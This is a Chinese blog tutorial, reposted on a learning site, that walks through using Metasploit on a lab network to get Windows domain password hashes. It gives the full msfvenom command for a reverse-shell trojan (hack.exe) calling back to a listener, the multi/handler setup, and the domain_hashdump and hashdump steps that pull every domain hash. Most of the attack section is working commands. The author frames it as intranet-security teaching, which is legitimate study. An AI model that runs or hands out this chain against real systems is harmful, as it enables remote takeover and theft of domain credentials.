栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 前沿技术 > 大数据 > 大数据系统

使用metasploit获取域散列值

使用metasploit获取域散列值

明天休息一天,后天补班,然后连续工作三天,请一天假,做PPT。是的,国庆我要讲内网安全入门,希望大家能捧个场。由于组内离职了2个核心员工,我设计的一堆项目,都没人开发了,Q4不得不自己Coding,一个是AI Spark项目,另一个是UEBA新规则,还有一堆杂七杂八的支撑项目。酒入愁肠愁更愁,也不知道自己能坚持多久,也不知道剩下的人能坚持多久。

第一步:生成木马文件
  • 生成木马(hack.exe)
  • 投递到目标服务(windows 192.168.160.143)
msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.160.140 -f exe > hack.exe

第二步:监听5555端口
  • 通过metasploit监听5555端口
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 5555

第三步:期待鱼儿上钩
  • 去目标服务器上双击一下木马(hack.exe)

第四步:获得shell会话
  • 只要双击(hack.exe),立马控制目标
exploit -j -z

由于是双击的木马,并不是特权账号,导致无法获得ntds.dit活动目录文件,也就无法拿到域散列值。所以,我又通过管理员权限运行了木马文件,这回有了。

第五步:读取ntds.dit,解析得到域散列值
use windows/gather/credentials/domain_hashdump
set session 3
  • 遗憾的是,竟然报错,我一个特权账号,竟然拷贝不出来ntds.dit

  • 怎么能放弃?继续搞!
  • 直接进入shell会话里,hashdump直接拿到所有的域散列值

本篇完~

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/680010.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号